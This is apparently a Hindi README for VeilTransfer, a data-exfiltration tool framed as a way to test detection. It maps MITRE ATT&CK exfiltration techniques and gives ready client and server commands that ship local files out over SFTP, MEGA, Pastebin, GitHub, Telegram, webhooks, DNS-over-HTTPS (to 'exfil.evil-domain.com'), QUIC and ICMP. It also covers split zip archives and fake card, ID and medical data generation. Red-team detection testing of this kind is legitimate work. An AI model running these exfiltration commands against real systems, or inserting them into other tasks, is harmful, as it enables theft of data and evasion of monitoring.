
VeilTransfer एक डेटा एक्सफिल्ट्रेशन उपयोगिता है जिसे पहचान क्षमताओं का परीक्षण और संवर्धन करने के लिए डिज़ाइन किया गया है। यह टूल उन्नत खतरे वाले अभिनेताओं द्वारा उपयोग की जाने वाली वास्तविक दुनिया की डेटा एक्सफिल्ट्रेशन तकनीकों का अनुकरण करता है, जिससे संगठन अपनी सुरक्षा स्थिति का मूल्यांकन और सुधार कर सकते हैं।
VeilTransfer एक डेटा एक्सफिल्ट्रेशन उपयोगिता है जिसे डिटेक्शन क्षमताओं का परीक्षण और संवर्धन करने के लिए डिज़ाइन किया गया है। यह टूल उन्नत खतरे वाले अभिनेताओं द्वारा उपयोग की जाने वाली वास्तविक-विश्व डेटा एक्सफिल्ट्रेशन तकनीकों का अनुकरण करता है, जिससे संगठन अपनी सुरक्षा स्थिति का मूल्यांकन और सुधार कर सकते हैं। MEGA, GitHub, SFTP, WebDAV और अन्य जैसी कई एक्सफिल्ट्रेशन विधियों का लाभ उठाकर, VeilTransfer आपके बचाव में कमियों की पहचान करने में मदद करता है और यह सुनिश्चित करता है कि आपके सुरक्षा समाधान आधुनिक डेटा उल्लंघनों का सामना करने के लिए तैयार हैं।
| ID | तकनीकें |
|---|---|
| T1029 | Scheduled Transfer |
| T1020 | Automated Exfiltration |
| T1132.001 | Data Encoding: Standard Encoding |
| T1560.002 | Archive Collected Data: Archive via Library |
| T1567.001 | Exfiltration Over Web Service: Exfiltration to Code Repository |
| T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage |
| T1567.003 | Exfiltration Over Web Service: Exfiltration to Text Storage |
| T1567.004 | Exfiltration Over Web Service: Exfiltration Over Webhook |
| T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol |
| T1048.002 | Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol |
VeilTransfer नकली डेटा उत्पन्न करने का समर्थन भी करता है, जिनमें शामिल हैं:
डेटा को बंडल और संपीड़ित करने के लिए आसानी से zip फ़ाइलें बनाएं, जिनका उपयोग एक्सफिल्ट्रेशन या विभिन्न परिदृश्यों के परीक्षण के लिए किया जा सकता है। आकार के आधार पर कई फ़ाइलों में वैकल्पिक विभाजन का समर्थन करता है।
यह उदाहरण दर्शाता है कि SFTP प्रोटोकॉल का उपयोग करके किसी रिमोट सर्वर पर फ़ाइल को सुरक्षित रूप से कैसे स्थानांतरित किया जाए। फ़ाइल स्थानीय मशीन पर स्थित है, और इसे SSH प्रमाणीकरण का उपयोग करके निर्दिष्ट रिमोट निर्देशिका में स्थानांतरित किया जाता है।
veiltransfer_client transfer sftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server example.com:22 -username user -password pass
इस उदाहरण में, एक स्थानीय निर्देशिका से फ़ाइलें WebDAV सर्वर पर अपलोड की जाती हैं। सर्वर को प्रमाणीकरण के लिए उपयोगकर्ता नाम और पासवर्ड की आवश्यकता होती है। सर्वर पैरामीटर में URI योजना (https:// या http://) शामिल होती है।
veiltransfer_client transfer webdav -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server http://webdav.example.com:8080 -username user -password pass
यह उदाहरण दिखाता है कि Mega Cloud स्टोरेज पर फ़ाइलें कैसे स्थानांतरित की जाती हैं। फ़ाइलें निर्दिष्ट स्थानीय निर्देशिका से अपलोड की जाती हैं, और प्रमाणीकरण उपयोगकर्ता के Mega Cloud क्रेडेंशियल्स का उपयोग करके संभाला जाता है।
veiltransfer_client transfer mega -localPath (/path/to/file or /path/to/directory) -username [email protected] -password megasecretpassword
इस उदाहरण में, एक फ़ाइल FTP सर्वर पर अपलोड की जाती है। फ़ाइल को रिमोट सर्वर पर एक विशिष्ट निर्देशिका में स्थानांतरित किया जाता है। सर्वर को प्रमाणीकरण के लिए उपयोगकर्ता नाम और पासवर्ड की आवश्यकता होती है।
veiltransfer_client transfer ftp -localPath (/path/to/file or /path/to/directory) -remoteDir /remote/path -server ftp.example.com:21 -username ftpuser -password ftppassword
यह उदाहरण दर्शाता है कि फ़ाइल की सामग्री को Pastebin पर कैसे अपलोड किया जाए। सामग्री उपयोगकर्ता द्वारा प्रदान की गई API कुंजी का उपयोग करके Pastebin पर पोस्ट की जाती है।
veiltransfer_client transfer pastebin -localPath (/path/to/file or /path/to/directory) -apiKey your_pastebin_api_key
यह उदाहरण दिखाता है कि स्थानीय मशीन से किसी विशिष्ट GitHub रिपॉज़िटरी में फ़ाइल कैसे पुश की जाए। फ़ाइल को प्रमाणीकरण के लिए उपयोगकर्ता के GitHub API टोकन का उपयोग करके रिपॉज़िटरी में जोड़ा जाता है।
veiltransfer_client transfer github -localPath (/path/to/file or /path/to/directory) -repo yourusername/repository -apiKey your_github_api_token
यह उदाहरण दर्शाता है कि किसी विशिष्ट Telegram चैनल पर फ़ाइल कैसे भेजी जाए। फ़ाइल Telegram बॉट API टोकन का उपयोग करके भेजी जाती है, और संदेश निर्दिष्ट चैनल ID पर पहुंचाया जाता है।
veiltransfer_client transfer telegram -localPath (/path/to/file or /path/to/directory) -telegramAPI your_telegram_bot_api_token -channelID 123456789
इस उदाहरण में, एक फ़ाइल की सामग्री को निर्दिष्ट Webhook URL पर भेजा जाता है।
veiltransfer_client transfer webhook -localPath (/path/to/file or /path/to/directory) -webhookURL https://webhook.site/your-webhook-url
DNS over HTTPS (DoH) का उपयोग करके एक सुरक्षित डेटा एक्सफिल्ट्रेशन तंत्र स्थापित करने के लिए, निम्नलिखित DNS रिकॉर्ड कॉन्फ़िगर किए जाने चाहिए:
A रिकॉर्ड: test को IP पते <VeilTransfer_IP_Address> पर इंगित करें।
test -> <VeilTransfer_IP_Address>
NS रिकॉर्ड: एक सबडोमेन (exfil) परिभाषित करें जो evil-domain.com द्वारा प्रबंधित है।
exfil -> test.evil-domain.com
डोमेन exfil.evil-domain.com DNS एक्सफिल डोमेन के रूप में कार्य करेगा।
फिर, निम्न कमांड के साथ VeilTransfer सर्वर को DoH मोड में प्रारंभ करें:
veiltransfer_server doh -key ag36rjsg284nfk2g -folder /root/data/exfil
नोट: एन्क्रिप्शन कुंजी (-key) 16 या 32 वर्ण लंबी होनी चाहिए।
DoH के माध्यम से फ़ाइलें अपलोड करने के लिए, सुनिश्चित करें कि VeilTransfer सर्वर वैध एन्क्रिप्शन कुंजी के साथ DoH मोड में सक्रिय रूप से चल रहा है। फिर, क्लाइंट कमांड का उपयोग करके स्थानांतरण प्रारंभ करें:
veiltransfer_client transfer doh -localPath /path/to/file_or_directory -key ag36rjsg284nfk2g -dnsServer exfil.evil-domain.com
VeilTransfer सर्वर को QUIC मोड में प्रारंभ करने के लिए, निम्न कमांड का उपयोग करें:
veiltransfer_server quic -cert /path/server.crt -key /path/server.key
सर्वर चालू होने के बाद, आप निम्न का उपयोग करके फ़ाइलें या निर्देशिकाएँ अपलोड कर सकते हैं:
veiltransfer_client transfer quic -localPath (/path/to/file or /path/to/directory) -server example.com:443
ICMP प्रोटोकॉल के माध्यम से फ़ाइल स्थानांतरण सक्षम करने के लिए, निम्न कमांड निष्पादित करके VeilTransfer सर्वर को ICMP मोड में प्रारंभ करें:
veiltransfer_server_linux icmp -folder /path/folder
सर्वर सक्रिय होने के बाद, ICMP के माध्यम से फ़ाइलें या निर्देशिकाएँ स्थानांतरित करने के लिए निम्न कमांड निष्पादित करें:
veiltransfer_client_linux transfer icmp -localPath (/path/to/file or /path/to/directory) -server <ip address>
निर्दिष्ट निर्देशिका से एक zip संग्रह बनाता है।
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip
निर्दिष्ट आकार के आधार पर कई भागों में विभाजित एक zip संग्रह बनाता है।
veiltransfer_client create-zip -localPath /path/to/directory -outputPath /path/to/output.zip -splitSize 1000000
यह उदाहरण दिखाता है कि नकली क्रेडिट कार्ड डेटा की 100 प्रविष्टियाँ कैसे उत्पन्न की जाएँ। उत्पन्न डेटा में क्रेडिट कार्ड नंबर, समाप्ति तिथियाँ और संबंधित विवरण शामिल होंगे।
veiltransfer_client generate-fake -ccn -count 100
यह उदाहरण दर्शाता है कि नकली KTP डेटा की 50 प्रविष्टियाँ कैसे उत्पन्न की जाएँ, जो इंडोनेशियाई पहचान पत्र हैं। डेटा में नाम, पता और KTP नंबर जैसी व्यक्तिगत जानकारी शामिल है।
veiltransfer_client generate-fake -ktp -count 50
उत्पन्न डेटा में अमेरिकी मानकों के अनुसार स्वरूपित सामाजिक सुरक्षा नंबर शामिल हैं।
veiltransfer_client generate-fake -ssn -count 200
यह उदाहरण दर्शाता है कि अंग्रेजी में 300 नकली मेडिकल रिकॉर्ड कैसे उत्पन्न किए जाएँ।
veiltransfer_client generate-fake -medical-record -count 300 -language en
VeilTransfer में योगदान का स्वागत है! यदि आपके पास नई सुविधाओं, एक्सफिल्ट्रेशन विधियों या सुधारों के विचार हैं, तो कृपया एक पुल अनुरोध सबमिट करें या GitHub पर एक मुद्दा खोलें।